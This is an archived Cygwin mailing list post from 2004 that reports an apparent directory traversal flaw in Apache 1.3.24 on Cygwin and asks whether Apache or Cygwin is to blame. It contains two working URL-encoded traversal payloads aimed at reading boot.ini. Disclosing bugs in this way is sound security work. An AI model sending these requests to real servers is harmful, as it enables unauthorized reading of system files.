This is the mail archive of the
cygwin@cygwin.com
mailing list for the Cygwin project.
Apache 1.3.24 vulnerability?
- From: "배상우\(Bae, Sang-Woo\)" <swbae at stgsecurity dot com>
- To: <cygwin at cygwin dot com>
- Date: Tue, 13 Jan 2004 14:07:39 +0900
- Subject: Apache 1.3.24 vulnerability?
I've experienced below security problems on cygwin environment.
you can download any files on web server.
http://[server]/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://[server]/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
is this a Apache 1.3.24 bug or a cygwin bug?